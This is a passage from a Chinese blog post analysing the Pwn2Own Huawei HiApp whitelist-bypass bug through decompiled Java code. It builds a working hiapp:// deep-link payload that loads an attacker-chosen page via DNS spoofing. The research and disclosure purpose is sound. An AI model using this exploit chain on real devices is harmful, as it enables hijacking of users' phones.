<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">a</span><span class="params">()</span> </span>&#123;</span><br><span class="line">   OpenGateway.a(<span class="string">&quot;activityName&quot;</span>, com.huawei.appmarket.service.activitydispatcher.b.a.class);</span><br><span class="line">   OpenGateway.a(<span class="string">&quot;activityUri&quot;</span>, com.huawei.appmarket.service.activitydispatcher.b.b.class);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>根据以上,Clazz.newInstance().a(activityNameValue, paramLst);这里的a方法由参数activityName单竖号(|)前的值控制,可为activityUri或activityName,而单竖号后的值，控制着要启动的Activity。</p>
<p>到这里我们先小结一下,根据上面的代码跟踪，我们可以构造的自定义Uri类似于:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hiapp:&#x2F;&#x2F;com.huawei.appmarket?activityName&#x3D;activityUri|xxxxxxx&amp;params&#x3D;&#123;&#125;&amp;channelId&#x3D;1</span><br><span class="line">或者</span><br><span class="line">hiapp:&#x2F;&#x2F;com.huawei.appmarket?activityName&#x3D;activityName|xxxxxxx&amp;params&#x3D;&#123;&#125;&amp;channelId&#x3D;1</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>接下来我们第二阶段的目标就是弄清楚,单竖号后的值应该怎么构造？第三阶段目标是弄清楚params怎么构造？</p>
<p>我们跟进com.huawei.appmarket.service.activitydispatcher.b.b.class的a方法查看.</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> com.huawei.appmarket.service.activitydispatcher.<span class="function">OpenGateway$b <span class="title">a</span><span class="params">(String activity, List paramLst)</span> </span>&#123;</span><br><span class="line">        i classI;</span><br><span class="line">        com.huawei.appmarket.service.activitydispatcher.OpenGateway$b relClass = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">if</span>(TextUtils.isEmpty(((CharSequence)activity))) &#123;</span><br><span class="line">            com.huawei.appmarket.sdk.foundation.b.a.a.a.e(<span class="string">&quot;ActivityUriProvider&quot;</span>, <span class="string">&quot;activityUri is NULL&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(c.b(activity) == <span class="keyword">null</span>) &#123;</span><br><span class="line">            com.huawei.appmarket.sdk.foundation.b.a.a.a.e(<span class="string">&quot;ActivityUriProvider&quot;</span>, <span class="string">&quot;can not find activityUri:&quot;</span> + activity);  <span class="comment">// 在ActivityUriProvider中(实际上是个map)查询activity是否存在</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            com.huawei.appmarket.service.activitydispatcher.OpenGateway$b tmpB = <span class="keyword">new</span> com.huawei.appmarket.service.activitydispatcher.OpenGateway$b();</span><br><span class="line">            <span class="keyword">if</span>(paramLst != <span class="keyword">null</span>) &#123;</span><br><span class="line">                Bundle b = <span class="keyword">new</span> Bundle();<span class="comment">//构造bundle传递params参数</span></span><br><span class="line">                <span class="keyword">if</span>(b.a(paramLst, b)) &#123;<span class="comment">//这里的b.a函数处理params参数，实际上调用的是a.a</span></span><br><span class="line">                    classI = <span class="keyword">new</span> i(activity, <span class="keyword">new</span> k(activity).a(b).b());</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span> &#123;</span><br><span class="line">                    com.huawei.appmarket.sdk.foundation.b.a.a.a.e(<span class="string">&quot;ActivityUriProvider&quot;</span>, <span class="string">&quot;param error,goMainActivity&quot;</span>);</span><br><span class="line">                    <span class="keyword">return</span> relClass;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> &#123;</span><br><span class="line">                classI = <span class="keyword">new</span> i(activity, <span class="keyword">new</span> k(activity).a().b());</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            tmpB.a(classI);  <span class="comment">// setClassI</span></span><br><span class="line">            relClass = tmpB;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> relClass;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>这里可以分析到c.b(activity)即是允许构造的activity名称检验，跟进这条调用链，同样是map，思路同上，这里直接给出结果如下:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">a</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">a</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        c.a(<span class="string">&quot;installmgr.activity&quot;</span>, AppInstallActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;updatemgr.activity&quot;</span>, AppUpdateActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;appmove.activity&quot;</span>, AppMoveActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;hisuiteconnect.activity&quot;</span>, HiSuiteConnectActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;main.activity&quot;</span>, MainActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;gameboxmain.activity&quot;</span>, GameBoxMainActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;market.activity&quot;</span>, MarketActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;gamebox.activity&quot;</span>, GameBoxActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;appzone.activity&quot;</span>, AppZoneActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;game.h5.error.activity&quot;</span>, GameH5ErrorActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;thirdappupdate.activity&quot;</span>, ThirdUpdateActivity.class);</span><br><span class="line">        c.b(<span class="string">&quot;wlanapplist.fragment&quot;</span>, d.class);</span><br><span class="line">        c.b(<span class="string">&quot;marketpersonal.fragment&quot;</span>, MarketPersonalFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;marketpersonaloversea.fragment&quot;</span>, MarketPersonalFragmentOversea.class);</span><br><span class="line">        c.b(<span class="string">&quot;manager.fragment&quot;</span>, ManagerFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;paymentapplist.fragment&quot;</span>, com.huawei.appmarket.service.paymentapp.a.class);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">a</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">a</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        c.a(<span class="string">&quot;gamereserved.activity&quot;</span>, AppReservedActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;purchasehistory.activity&quot;</span>, PurchaseHistoryActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;apptraceedit.activity&quot;</span>, AppTraceEditActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;permissions.activity&quot;</span>, PermissionsActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;pushmessage.activity&quot;</span>, PushMessageActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;pushdownloadalert.activity&quot;</span>, PushDownloadAlertActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;appdetail.activity&quot;</span>, AppDetailActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;appdetailreply.activity&quot;</span>, AppDetailReplyActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;video.activity&quot;</span>, VideoActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;installfailed.activity&quot;</span>, InstallFailDescriptionActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;share_dialog.activity&quot;</span>, ShareDialogActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;sns_share_dialog.activity&quot;</span>, SnsShareDialogActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;weibo_share_dialog.activity&quot;</span>, WeiboShareDialogActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;gallery.activity&quot;</span>, GalleryActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;apkmgr.activity&quot;</span>, ApkManagementActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;third_app_download.activity&quot;</span>, ThirdAppDownloadActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;child.mode.proxy.activity&quot;</span>, ProxyActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;webview.activity&quot;</span>, WebViewActivity.class);</span><br><span class="line">        c.a(<span class="string">&quot;search.activity&quot;</span>, SearchActivity.class);</span><br><span class="line">        c.b(<span class="string">&quot;gamereserved.fragment&quot;</span>, b.class);</span><br><span class="line">        c.b(<span class="string">&quot;updatemgr.fragment&quot;</span>, UpdateManagerFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;apptraceleftlist.fragment&quot;</span>, com.huawei.appmarket.service.pay.purchase.a.class);</span><br><span class="line">        c.b(<span class="string">&quot;apptracerightlist.fragment&quot;</span>, com.huawei.appmarket.service.pay.purchase.a.class);</span><br><span class="line">        c.b(<span class="string">&quot;appzonelist.fragment&quot;</span>, com.huawei.appmarket.service.pay.purchase.c.class);</span><br><span class="line">        c.b(<span class="string">&quot;appzoneeditlist.fragment&quot;</span>, com.huawei.appmarket.service.pay.purchase.b.class);</span><br><span class="line">        c.b(<span class="string">&quot;applist.fragment&quot;</span>, com.huawei.appmarket.framework.fragment.b.class);</span><br><span class="line">        c.b(<span class="string">&quot;appcategory.fragment&quot;</span>, AppCategoryFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;appdetail.fragment&quot;</span>, AppDetailFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;appsubcategory.fragment&quot;</span>, AppSubCategoryFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;appcomment.fragment&quot;</span>, AppCommentFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;appintroduce.fragment&quot;</span>, AppIntroduceFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;apprecommend.fragment&quot;</span>, AppRecommendFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;appreply.fragment&quot;</span>, AppReplyFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;appnocontent.fragment&quot;</span>, AppNoContentFragment.class);</span><br><span class="line">        c.b(<span class="string">&quot;loading.fragment&quot;</span>, j.class);</span><br><span class="line">        c.b(<span class="string">&quot;loadingex.fragment&quot;</span>, LoadingFragmentEx.class);</span><br><span class="line">        c.b(<span class="string">&quot;Tipsloading.fragment&quot;</span>, n.class);</span><br><span class="line">        c.b(<span class="string">&quot;installfailed.fragment&quot;</span>, d.class);</span><br><span class="line">        c.b(<span class="string">&quot;tabapplist.fragment&quot;</span>, l.class);</span><br><span class="line">        c.b(<span class="string">&quot;hotword.fragment&quot;</span>, e.class);</span><br><span class="line">        c.b(<span class="string">&quot;autocomplete.fragment&quot;</span>, com.huawei.appmarket.service.search.view.a.a.class);</span><br><span class="line">        c.b(<span class="string">&quot;search.fragment&quot;</span>, com.huawei.appmarket.service.search.view.a.c.class);</span><br><span class="line">        c.b(<span class="string">&quot;searchresult.fragment&quot;</span>, g.class);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>第一个参数即是我们可以控制的欲启动的activity的值(单竖号后的值)</p>
<p>第三阶段，我们需要弄明白怎么去构造params参数里的值，在handlerUri函数传进来的是jsonArry,之后经过处理后变成Param类，再构造成Bundle.</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Nullable</span> <span class="function"><span class="keyword">private</span> <span class="keyword">static</span> List <span class="title">a</span><span class="params">(JSONArray inJsonArry)</span> </span>&#123;</span><br><span class="line">        ArrayList v0_2;</span><br><span class="line">        List v0 = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">if</span>(inJsonArry != <span class="keyword">null</span> &amp;&amp; inJsonArry.length() &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            ArrayList relLst = <span class="keyword">new</span> ArrayList();</span><br><span class="line">            <span class="keyword">int</span> i;</span><br><span class="line">            <span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; inJsonArry.length(); ++i) &#123;</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    JSONObject jsonObj = inJsonArry.getJSONObject(i);</span><br><span class="line">                    Param param = <span class="keyword">new</span> Param();</span><br><span class="line">                    param.fromJson(jsonObj);</span><br><span class="line">                    ((List)relLst).add(param);</span><br><span class="line">                &#125;</span><br><span class="line">                ...</span><br><span class="line">        <span class="keyword">return</span> ((List)v0_2);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">b.a(paramLst, b) 函数实际为b的父类a，也即调用了a.a方法，讲Param类参数设置进bundle中。</span><br></pre></td></tr></table></figure>

<p>查看Param类可知,我们可构造的参数有</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> String iv;</span><br><span class="line"><span class="keyword">private</span> String name;</span><br><span class="line"><span class="keyword">private</span> String type;</span><br><span class="line"><span class="keyword">private</span> String value;</span><br></pre></td></tr></table></figure>
<p>至此，我们最终构造的uri为:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&amp;params=&#123;&#x27;params&#x27; : [ &#123; &#x27;name&#x27; : &#x27;xxx&#x27;, &#x27;type&#x27; : &#x27;xxx&#x27;, &#x27;value&#x27; : &#x27;xxx&#x27; &#125;, &#123; &#x27;name&#x27; : &#x27;xxx&#x27;, &#x27;type&#x27; : &#x27;xxx&#x27;, &#x27;value&#x27; : &#x27;xxxx&#x27; &#125; ] &#125;&amp;channelId=1</span><br></pre></td></tr></table></figure>
<p>小结一下:我们从之前代码分析可知，这里能控制的参数是非常多以及涉及到很多类，因此是有比较大的攻击面。</p>
<p>由于是顺着漏洞作者发现的漏洞进行分析，所以这里进入分析webview.activity所启动的类，也即如何来构造各个值，达到控制的结果。</p>
<p>跟进 WebViewActivity.class</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">onCreate</span><span class="params">(Bundle arg4)</span> </span>&#123;  </span><br><span class="line">        <span class="keyword">super</span>.onCreate(arg4);</span><br><span class="line">        Request request = <span class="keyword">this</span>.getProtocol().getRequest();  <span class="comment">// this.delegate.a();</span></span><br><span class="line">        <span class="keyword">this</span>.mWebvewDelegate = <span class="keyword">this</span>.createDelegate(request);  <span class="comment">// webViewDelegate 初始化为具体的类</span></span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">this</span>.mWebvewDelegate == <span class="keyword">null</span>) &#123;</span><br><span class="line">            a.e(WebViewActivity.TAG, <span class="string">&quot;mWebvewDelegate is null,uri=&quot;</span> + <span class="keyword">this</span>.mDelegateUri);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            String url = request.getUrl();  <span class="comment">// 获取到第二个参数url</span></span><br><span class="line">            <span class="keyword">if</span>(!g.isEmpty(url)) &#123;</span><br><span class="line">                <span class="keyword">if</span>(!<span class="keyword">this</span>.mWebvewDelegate.check(((Context)<span class="keyword">this</span>), request)) &#123;  </span><br><span class="line">                    <span class="keyword">this</span>.finish();</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">this</span>.mWebvewDelegate.onCreate(((Context)<span class="keyword">this</span>), request);</span><br><span class="line">                    <span class="keyword">this</span>.setContentView();</span><br><span class="line">                    <span class="keyword">this</span>.mWebvewDelegate.initView(((Context)<span class="keyword">this</span>), request);<span class="comment">//我是彩蛋</span></span><br><span class="line">                    <span class="keyword">this</span>.mWebvewDelegate.loadPage(url);  <span class="comment">// 加载url</span></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>这里有个步骤是怎么把传过来的bundle转换成request并作处理，这一部分不做分析，读者可自行尝试。<br>实际上这里仅需要构造两个参数uri和url,uri控制着启动Activity,url控制着需要load的页面。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">WebviewConfig</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">WebviewConfig</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">super</span>();</span><br><span class="line">    &#125;</span><br><span class="line"><span class="comment">//第一个参数即为uri</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">init</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        WebviewFactory.INSTANCE.registerDelegate(<span class="string">&quot;internal_webview&quot;</span>, InternalWebviewDelegate.class);  <span class="comment">// internal_webview</span></span><br><span class="line">        WebviewFactory.INSTANCE.registerDelegate(<span class="string">&quot;external_webview&quot;</span>, InternalWebviewDelegate.class);</span><br><span class="line">        WebviewFactory.INSTANCE.registerDelegate(<span class="string">&quot;user_privacy_webview&quot;</span>, UserPrivacyWebviewDelegate.class);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>至此，我们最终可以构造的URI为:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">document.location = <span class="string">&quot;hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&amp;params=&#123;&#x27;params&#x27; : [ &#123; &#x27;name&#x27; : &#x27;uri&#x27;, &#x27;type&#x27; : &#x27;String&#x27;, &#x27;value&#x27; : &#x27;internal_webview&#x27; &#125;, &#123; &#x27;name&#x27; : &#x27;url&#x27;, &#x27;type&#x27; : &#x27;String&#x27;, &#x27;value&#x27; : &#x27;http://www.vmall.com:8000/stage2.html&#x27; &#125; ] &#125;&amp;channelId=1&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>可以看到，在loadPage之前是有安全性检验的，必须是指定的域名匹配后才能够通过，因此这里是没办法load自定义的url的。</p>
<p>但是,第一部分漏洞的关键点就是: 没有进行https通信,因此通过DNS欺骗劫持域名即可使该域名加载自己网页内容。(你没看错 这就没了 = =)</p>
<h3 id="0x03-漏洞总结"><a href="#0x03-漏洞总结" class="headerlink" title="0x03 漏洞总结"></a>0x03 漏洞总结</h3><ul>
<li><p>一开始由组件暴露的ThirdApiActivity作为切入点进行漏洞挖掘。</p>
</li>
<li><p>经过该类代码分析后，发现由getAction函数返回对应的action并由该具体的action执行onAction函数。这里第一部分我们可以控制的地方就是这个action的值。</p>
</li>
<li><p>紧接着进入onAction函数调用了handleUri,这部分我们可以控制的是activityName或activityUri，从而控制启动什么样的activity。(响应ACTION.VIEW)</p>
</li>
<li><p>而被启动的Activity调用onCreate函数处理我们可以控制的params参数。依此我们可以巧妙地构造攻击链。</p>
</li>
</ul>
<p>第二部分的漏洞分析敬请期待。</p>
<h3 id="0x04-参考"><a href="#0x04-参考" class="headerlink" title="0x04 参考"></a>0x04 参考</h3><p><a target="_blank" rel="noopener" href="https://labs.mwrinfosecurity.com/assets/BlogFiles/huawei-mate9pro-pwn2own-write-up-final-2018-04-26.pdf">https://labs.mwrinfosecurity.com/assets/BlogFiles/huawei-mate9pro-pwn2own-write-up-final-2018-04-26.pdf </a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/whoislcj/p/5825333.html">Android业务组件化之URL Scheme使用</a></p>
<h3 id="0x05-声明"><a href="#0x05-声明" class="headerlink" title="0x05 声明"></a>0x05 声明</h3><p>本文章仅做学习研究用途，其他非法用途，本人概不负责。建议华为手机用户尽快更新HiApp以及IReader应用，以免遭到入侵控制，造成损失。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Android%E6%BC%8F%E6%B4%9E/" rel="tag"># Android漏洞</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2018/10/02/Pwn2Own%E5%8D%8E%E4%B8%BAiReader%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/" rel="prev" title="Pwn2Own华为iReader漏洞原理与利用分析">
      <i class="fa fa-chevron-left"></i> Pwn2Own华为iReader漏洞原理与利用分析
    </a></div>
      <div class="post-nav-item">
    <a href="/2018/10/04/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8B/" rel="next" title="Pwn2Own华为HiApp漏洞原理与利用分析(下)">
      Pwn2Own华为HiApp漏洞原理与利用分析(下) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">0x01 简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">0x01 漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E9%83%A8%E5%88%86-HiApp%E7%99%BD%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87"><span class="nav-number">2.1.</span> <span class="nav-text">第一部分 HiApp白名单绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93"><span class="nav-number">3.</span> <span class="nav-text">0x03 漏洞总结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-%E5%8F%82%E8%80%83"><span class="nav-number">4.</span> <span class="nav-text">0x04 参考</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-%E5%A3%B0%E6%98%8E"><span class="nav-number">5.</span> <span class="nav-text">0x05 声明</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Tasfa</p>
  <div class="site-description" itemprop="description">AndroidSecurity</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Tasfa</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
